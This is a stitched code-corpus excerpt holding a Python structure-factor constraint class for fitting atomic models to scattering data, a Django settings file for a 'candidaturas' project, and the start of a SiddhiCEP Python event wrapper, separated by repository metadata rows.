respectively 'atomicNumber' and 'neutronCohb'. If attribute
values are missing in the pdbparser database, atomic weights
must be given in atomsWeight dictionary argument.
"""
if weighting.lower() in ["xrays","x-rays","xray","x-ray"]:
LOGGER.fixed("'%s' weighting is set to atomicNumber"%weighting)
weighting = "atomicNumber"
elif weighting.lower() in ["neutron","neutrons"]:
LOGGER.fixed("'%s' weighting is set to neutronCohb"%weighting)
weighting = "neutronCohb"
assert is_element_property(weighting),LOGGER.error( "weighting is not a valid pdbparser atoms database entry")
assert weighting != "atomicFormFactor", LOGGER.error("atomicFormFactor weighting is not allowed")
self.__weighting = weighting
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__weighting': self.__weighting})
def set_atoms_weight(self, atomsWeight):
"""
        Set custom atom weights. This is the way to set atom weights
        different from those of the given weighting scheme.
:Parameters:
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
               atom elements and values are custom weights. If None is given
               or partially given, missing element weights will be fully set
               using the given weighting scheme.
"""
if atomsWeight is None:
AW = {}
else:
assert isinstance(atomsWeight, dict),LOGGER.error("atomsWeight must be None or a dictionary")
AW = {}
for k in atomsWeight:
assert isinstance(k, basestring),LOGGER.error("atomsWeight keys must be strings")
try:
val = float(atomsWeight[k])
except:
raise LOGGER.error( "atomsWeight values must be numerical")
AW[k]=val
# set atomsWeight
self.__atomsWeight = AW
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__atomsWeight': self.__atomsWeight})
def set_window_function(self, windowFunction):
"""
Set convolution window function.
:Parameters:
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
"""
if windowFunction is not None:
assert isinstance(windowFunction, np.ndarray), LOGGER.error("windowFunction must be a numpy.ndarray")
assert windowFunction.dtype.type is FLOAT_TYPE, LOGGER.error("windowFunction type must be %s"%FLOAT_TYPE)
assert len(windowFunction.shape) == 1, LOGGER.error("windowFunction must be of dimension 1")
assert len(windowFunction) <= self.experimentalData.shape[0], LOGGER.error("windowFunction length must be smaller than experimental data")
# normalize window function
windowFunction /= np.sum(windowFunction)
# check window size
# set windowFunction
self.__windowFunction = windowFunction
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__windowFunction': self.__windowFunction})
def set_experimental_data(self, experimentalData):
"""
Set constraint's experimental data.
:Parameters:
#. experimentalData (numpy.ndarray, string): The experimental
data as numpy.ndarray or string path to load data using
numpy.loadtxt function.
"""
# get experimental data
super(StructureFactorConstraint, self).set_experimental_data(experimentalData=experimentalData)
# set limits
self.set_limits(self.limits)
def set_limits(self, limits):
"""
Set the reciprocal distance limits (qmin, qmax).
:Parameters:
#. limits (None, tuple, list): Distance limits to bound
experimental data and compute histograms.
If None is given, the limits will be automatically set to
min and max reciprocal distance recorded in experimental data.
If given, a tuple of minimum reciprocal distance (qmin) or None
and maximum reciprocal distance (qmax) or None should be given.
"""
self._ExperimentalConstraint__set_limits(limits)
# set qvalues
self.__experimentalQValues = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,0].astype(FLOAT_TYPE)
self.__experimentalSF = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,1].astype(FLOAT_TYPE)
# set qmin and qmax
self.__qmin = self.__experimentalQValues[0]
self.__qmax = self.__experimentalQValues[-1]
        assert self.__qmin>0, LOGGER.error("qmin must be bigger than 0. Experimental null q values are ambiguous. Try setting limits.")
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__experimentalQValues': self.__experimentalQValues,
'_StructureFactorConstraint__experimentalSF' : self.__experimentalSF,
'_StructureFactorConstraint__qmin' : self.__qmin,
'_StructureFactorConstraint__qmax' : self.__qmax})
# set used dataWeights
self._set_used_data_weights(limitsIndexStart=self.limitsIndexStart, limitsIndexEnd=self.limitsIndexEnd)
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def update_standard_error(self):
""" Compute and set constraint's standardError."""
# set standardError
totalSQ = self.get_constraint_value()["total_no_window"]
self.set_standard_error(self.compute_standard_error(modelData = totalSQ))
def check_experimental_data(self, experimentalData):
"""
Check whether experimental data is correct.
:Parameters:
#. experimentalData (object): The experimental data to check.
:Returns:
#. result (boolean): Whether it is correct or not.
#. message (str): Checking message that explains whats's wrong
with the given data
"""
if not isinstance(experimentalData, np.ndarray):
return False, "experimentalData must be a numpy.ndarray"
if experimentalData.dtype.type is not FLOAT_TYPE:
return False, "experimentalData type must be %s"%FLOAT_TYPE
if len(experimentalData.shape) !=2:
return False, "experimentalData must be of dimension 2"
if experimentalData.shape[1] !=2:
return False, "experimentalData must have only 2 columns"
# check distances order
inOrder = (np.array(sorted(experimentalData[:,0]), dtype=FLOAT_TYPE)-experimentalData[:,0])<=PRECISION
if not np.all(inOrder):
return False, "experimentalData distances are not sorted in order"
if experimentalData[0][0]<0:
return False, "experimentalData distances min value is found negative"
# data format is correct
return True, ""
def compute_standard_error(self, modelData):
"""
Compute the standard error (StdErr) as the squared deviations
between model computed data and the experimental ones.
.. math::
StdErr = \\sum \\limits_{i}^{N} W_{i}(Y(X_{i})-F(X_{i}))^{2}
Where:\n
:math:`N` is the total number of experimental data points. \n
:math:`W_{i}` is the data point weight. It becomes equivalent to 1 when dataWeights is set to None. \n
:math:`Y(X_{i})` is the experimental data point :math:`X_{i}`. \n
:math:`F(X_{i})` is the computed from the model data :math:`X_{i}`. \n
:Parameters:
#. modelData (numpy.ndarray): The data to compare with the
experimental one and compute the squared deviation.
:Returns:
#. standardError (number): The calculated constraint's
standardError.
"""
# compute difference
diff = self.__experimentalSF-modelData
# return standard error
if self._usedDataWeights is None:
return np.add.reduce((diff)**2)
else:
return np.add.reduce(self._usedDataWeights*((diff)**2))
def _get_Sq_from_Gr(self, Gr):
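        # discrete sine Fourier transform of G(r); the +1 restores the
        # <S(Q)>=1 normalization used by this constraint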
return np.sum(Gr.reshape((-1,1))*self.__Gr2SqMatrix, axis=0)+1
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*(Sq-1) + 1
return Sq
def __get_total_Sq(self, data, rho0):
"""This method is created just to speed up the computation of
the total Sq upon fitting."""
Gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
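            # (Nij is the number of distinct pairs: ni*(ni-1)/2 for identical
            #  elements, ni*nj otherwise)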
if idi == idj:
Nij = ni*(ni-1)/2.0
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["inter"][idi,idj,:]
Gr += wij*nij/Dij
else:
Nij = ni*nj
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["intra"][idj,idi,:] + data["inter"][idi,idj,:]+data["inter"][idj,idi,:]
Gr += wij*nij/Dij
        # Divide by shell volumes
Gr /= self.shellVolumes
# compute total G(r)
#rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
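        # convert g(r) into the reduced pair distribution function
        # G(r) = 4*pi*rho0*r*(g(r)-1) prior to the sine Fourier transform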
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0)*(Gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# Multiply by scale factor
self._fittedScaleFactor = self.get_adjusted_scale_factor(self.__experimentalSF, Sq, self._usedDataWeights)
# apply scale factor
Sq = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
Sq = self._apply_multiframe_prior(Sq)
# convolve total with window function
if self.__windowFunction is not None:
Sq = np.convolve(Sq, self.__windowFunction, 'same')
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
"""Overload to reduce S(q) prior to fitting scale factor.
S(q) -> 1 at high q and this will create a wrong scale factor.
        Overloading can be avoided but it is done this way for performance reasons.
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData-1, modelData-1, dataWeights)
return SF
def _get_constraint_value(self, data, applyMultiframePrior=True):
# http://erice2011.docking.org/upload/Other/Billinge_PDF/03-ReadingMaterial/BillingePDF2011.pdf page 6
#import time
#startTime = time.clock()
output = {}
for pair in self.__elementsPairs:
output["sf_intra_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_inter_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_total_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:]
else:
Nij = ni*nj
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:] + data["intra"][idj,idi,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:] + data["inter"][idj,idi,:]
# compute g(r)
nij = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
dij = nij/self.__shellVolumes
Dij = Nij/self.engine.volume
gr += wij*dij/Dij
# calculate intensityFactor
intensityFactor = (self.engine.volume*wij)/(Nij*self.__shellVolumes)
# divide by factor
output["sf_intra_%s-%s" % pair] *= intensityFactor
output["sf_inter_%s-%s" % pair] *= intensityFactor
output["sf_total_%s-%s" % pair] = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
# Compute S(q) from G(r)
output["sf_intra_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_intra_%s-%s" % pair])
output["sf_inter_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_inter_%s-%s" % pair])
output["sf_total_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_total_%s-%s" % pair])
# compute total G(r)
rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0) * (gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# multiply by scale factor
output["total_no_window"] = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
if applyMultiframePrior:
output["total_no_window"] = self._apply_multiframe_prior(output["total_no_window"])
# convolve total with window function
if self.__windowFunction is not None:
output["total"] = np.convolve(output["total_no_window"], self.__windowFunction, 'same').astype(FLOAT_TYPE)
else:
output["total"] = output["total_no_window"]
return output
def get_constraint_value(self, applyMultiframePrior=True):
"""
Compute all partial Structure Factor (SQs).
:Parameters:
#. applyMultiframePrior (boolean): Whether to apply subframe weight
and prior to the total. This will only have an effect when used
frame is a subframe and in case subframe weight and prior is
defined.
:Returns:
            #. SQs (dictionary): The SQs dictionary, where keys are the
element wise intra and inter molecular SQs and values are
the computed SQs.
"""
if self.data is None:
LOGGER.warn("data must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.data, applyMultiframePrior=applyMultiframePrior)
def get_constraint_original_value(self):
"""
        Compute all partial Structure Factors (SQs) from the original data.
        :Returns:
            #. SQs (dictionary): The SQs dictionary, where keys are the
               element wise intra and inter molecular SQs and values are
               the computed SQs.
"""
if self.originalData is None:
LOGGER.warn("originalData must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.originalData)
@reset_if_collected_out_of_date
def compute_data(self, update=True):
""" Compute constraint's data.
:Parameters:
#. update (boolean): whether to update constraint data and
standard error with new computation. If data is computed and
updated by another thread or process while the stochastic
engine is running, this might lead to a state alteration of
               the constraint, which will lead to no additional accepted
               moves in the run.
:Returns:
#. data (dict): constraint data dictionary
#. standardError (float): constraint standard error
"""
intra,inter = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# create data and compute standard error
data = {"intra":intra, "inter":inter}
totalSQ = self.__get_total_Sq(data, rho0=self.engine.numberDensity)
stdError = self.compute_standard_error(modelData = totalSQ)
# update
if update:
self.set_data(data)
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
self.set_standard_error(stdError)
# set original data
if self.originalData is None:
self._set_original_data(self.data)
# return
return data, stdError
def compute_before_move(self, realIndexes, relativeIndexes):
"""
Compute constraint before move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
"""
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
self.set_active_atoms_data_before_move( {"intra":intraM-intraF, "inter":interM-interF} )
self.set_active_atoms_data_after_move(None)
def compute_after_move(self, realIndexes, relativeIndexes, movedBoxCoordinates):
"""
Compute constraint after move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
#. movedBoxCoordinates (numpy.ndarray): The moved atoms new coordinates.
"""
# change coordinates temporarily
boxData = np.array(self.engine.boxCoordinates[relativeIndexes], dtype=FLOAT_TYPE)
self.engine.boxCoordinates[relativeIndexes] = movedBoxCoordinates
# calculate pair distribution function
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# set active atoms data
self.set_active_atoms_data_after_move( {"intra":intraM-intraF, "inter":interM-interF} )
# reset coordinates
self.engine.boxCoordinates[relativeIndexes] = boxData
# compute standardError after move
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
totalSQ = self.__get_total_Sq({"intra":dataIntra, "inter":dataInter}, rho0=self.engine.numberDensity)
self.set_after_move_standard_error( self.compute_standard_error(modelData = totalSQ) )
# increment tried
self.increment_tried()
def accept_move(self, realIndexes, relativeIndexes):
"""
Accept move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
# change permanently _data
self.set_data( {"intra":dataIntra, "inter":dataInter} )
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_standard_error( self.afterMoveStandardError )
self.set_after_move_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
# increment accepted
self.increment_accepted()
def reject_move(self, realIndexes, relativeIndexes):
"""
Reject move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_after_move_standard_error( None )
def compute_as_if_amputated(self, realIndex, relativeIndex):
"""
Compute and return constraint's data and standard error as if
given atom is amputated.
:Parameters:
#. realIndex (numpy.ndarray): Atom's index as a numpy array
of a single element.
#. relativeIndex (numpy.ndarray): Atom's relative index as a
numpy array of a single element.
"""
# compute data
self.compute_before_move(realIndexes=realIndex, relativeIndexes=relativeIndex)
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]
data = {"intra":dataIntra, "inter":dataInter}
# temporarily adjust self.__weightingScheme
weightingScheme = self.__weightingScheme
relativeIndex = relativeIndex[0]
selectedElement = self.engine.allElements[relativeIndex]
self.engine.numberOfAtomsPerElement[selectedElement] -= 1
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight )
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
## END OF ADDED 08 FEB 2017
# compute standard error
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
SF = self.adjustScaleFactorFrequency
self._set_adjust_scale_factor_frequency(0)
rho0 = ((self.engine.numberOfAtoms-1)/self.engine.volume).astype(FLOAT_TYPE)
totalSQ = self.__get_total_Sq(data, rho0=rho0)
standardError = self.compute_standard_error(modelData = totalSQ)
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
self._set_adjust_scale_factor_frequency(SF)
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
# set amputation
self.set_amputation_data( {'data':data, 'weightingScheme':self.__weightingScheme} )
# compute standard error
self.set_amputation_standard_error( standardError )
# reset weightingScheme and number of atoms per element
self.__weightingScheme = weightingScheme
self.engine.numberOfAtomsPerElement[selectedElement] += 1
def accept_amputation(self, realIndex, relativeIndex):
"""
        Accept amputated atom and set constraint's data and standard error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
#self.set_data( self.amputationData ) ## COMMENTED 08 FEB 2017
self.set_data( self.amputationData['data'] )
self.__weightingScheme = self.amputationData['weightingScheme']
self.set_standard_error( self.amputationStandardError )
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
def reject_amputation(self, realIndex, relativeIndex):
"""
Reject amputated atom and set constraint's data and standard
error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
def _on_collector_collect_atom(self, realIndex):
pass
def _on_collector_release_atom(self, realIndex):
pass
def _constraint_copy_needs_lut(self):
return {'_StructureFactorConstraint__elementsPairs' :'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__histogramSize' :'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__weightingScheme' :'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__shellVolumes' :'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__shellCenters' :'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__windowFunction' :'_StructureFactorConstraint__windowFunction',
'_StructureFactorConstraint__experimentalQValues' :'_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF' :'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__Gr2SqMatrix' :'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__minimumDistance' :'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance' :'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin' :'_StructureFactorConstraint__bin',
'_ExperimentalConstraint__scaleFactor' :'_ExperimentalConstraint__scaleFactor',
'_ExperimentalConstraint__dataWeights' :'_ExperimentalConstraint__dataWeights',
'_ExperimentalConstraint__multiframePrior' :'_ExperimentalConstraint__multiframePrior',
'_ExperimentalConstraint__multiframeWeight' :'_ExperimentalConstraint__multiframeWeight',
'_ExperimentalConstraint__limits' :'_ExperimentalConstraint__limits',
'_ExperimentalConstraint__limitsIndexStart' :'_ExperimentalConstraint__limitsIndexStart',
'_ExperimentalConstraint__limitsIndexEnd' :'_ExperimentalConstraint__limitsIndexEnd',
'_Constraint__used' :'_Constraint__used',
'_Constraint__data' :'_Constraint__data',
'_Constraint__state' :'_Constraint__state',
'_Constraint__standardError' :'_Constraint__standardError',
'_fittedScaleFactor' :'_fittedScaleFactor',
'_usedDataWeights' :'_usedDataWeights',
'_Engine__state' :'_Engine__state',
'_Engine__boxCoordinates' :'_Engine__boxCoordinates',
'_Engine__basisVectors' :'_Engine__basisVectors',
'_Engine__isPBC' :'_Engine__isPBC',
'_Engine__moleculesIndex' :'_Engine__moleculesIndex',
'_Engine__elementsIndex' :'_Engine__elementsIndex',
'_Engine__numberOfAtomsPerElement' :'_Engine__numberOfAtomsPerElement',
'_Engine__elements' :'_Engine__elements',
'_Engine__numberDensity' :'_Engine__numberDensity',
'_Engine__volume' :'_Engine__volume',
'_Engine__realCoordinates' :'_Engine__realCoordinates',
'_atomsCollector' :'_atomsCollector',
('engine','_atomsCollector') :'_atomsCollector',
}
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
class ReducedStructureFactorConstraint(StructureFactorConstraint):
"""
    The Reduced Structure Factor, which we will also denote S(Q),
is exactly the same quantity as the Structure Factor but with
the slight difference that it is normalized to 0 rather than 1
and therefore :math:`<S(Q)>=0`.
The computation of S(Q) is done through a Sine inverse Fourier transform
of the computed pair distribution function noted as G(r).
.. math::
S(Q) = \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
    The only reason the Reduced Structure Factor is implemented is that many
    experimental data sets are provided in this form, and it is simply
    convenient not to have to transform the experimental data every time.
"""
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.Gr2SqMatrix, axis=0)
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*Sq
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
""" dummy overload that does exactly the same thing
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData, modelData, dataWeights)
return SF
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)-1$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
| agpl-3.0 | 7,406,735,951,820,464,000 | 49.032659 | 178 | 0.575891 | false | 4.479081 | false | false | false |
pedroluislopez/candidaturas | candidaturas/settings.py | 1 | 2424 | """
Django settings for candidaturas project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.global_settings import MEDIA_URL
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^-c)soc5oay)1a74+8$xe!jf)3@lro!1^xaxscz$f$peju@xto'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'candidatos',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'candidaturas.urls'
WSGI_APPLICATION = 'candidaturas.wsgi.application'
DATABASE_NAME = ''
DATABASE_USER = ''
DATABASE_PASSWORD = ''
try:
from local_settings import *
except ImportError:
pass
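# Database credentials are expected to be supplied by an untracked
# local_settings.py; the empty defaults above are used otherwise.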
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': DATABASE_NAME,
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'Europe/Madrid'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
| gpl-3.0 | -6,178,601,633,671,091,000 | 23.484848 | 71 | 0.720297 | false | 3.271255 | false | false | false |
madhawav/SiddhiCEPPythonAPI | SiddhiCEP3/core/event/ComplexEvent.py | 1 | 3787 | from enum import Enum
from SiddhiCEP3 import SiddhiLoader
from SiddhiCEP3.DataTypes.DataWrapper import unwrapData, wrapData
class ComplexEvent(object):
class Type(Enum):
        CURRENT = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().CURRENT()
        EXPIRED = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().EXPIRED()
        TIMER = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().TIMER()
RESET = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().RESET()
@classmethod
def _map_value(cls, type_proxy):
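        # translate the wrapped Java TypeProxy into the corresponding
        # Python enum member by probing its isValue* flags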
type_value = None
if type_proxy.isValueCurrent():
type_value = ComplexEvent.Type.CURRENT
elif type_proxy.isValueExpired():
type_value = ComplexEvent.Type.EXPIRED
elif type_proxy.isValueTimer():
type_value = ComplexEvent.Type.TIMER
elif type_proxy.isValueReset():
type_value = ComplexEvent.Type.RESET
else:
raise TypeError("Unknown Complex Event Type")
return ComplexEvent.Type(type_value)
def __init__(self,):
raise NotImplementedError("Complex Event is Abstract")
def __new__(cls):
bare_instance = object.__new__(cls)
bare_instance._complex_event_proxy = None
return bare_instance
@classmethod
def _fromComplexEventProxy(cls, complex_event_proxy):
'''
Internal Constructor to wrap around JAVA Interface Complex Event
:param complex_event_proxy:
:return:
'''
if complex_event_proxy is None:
return None
instance = cls.__new__(cls)
instance._complex_event_proxy = complex_event_proxy
return instance
def getNext(self):
next_proxy = self._complex_event_proxy.getNext()
return ComplexEvent._fromComplexEventProxy(next_proxy)
def setNext(self, next_event):
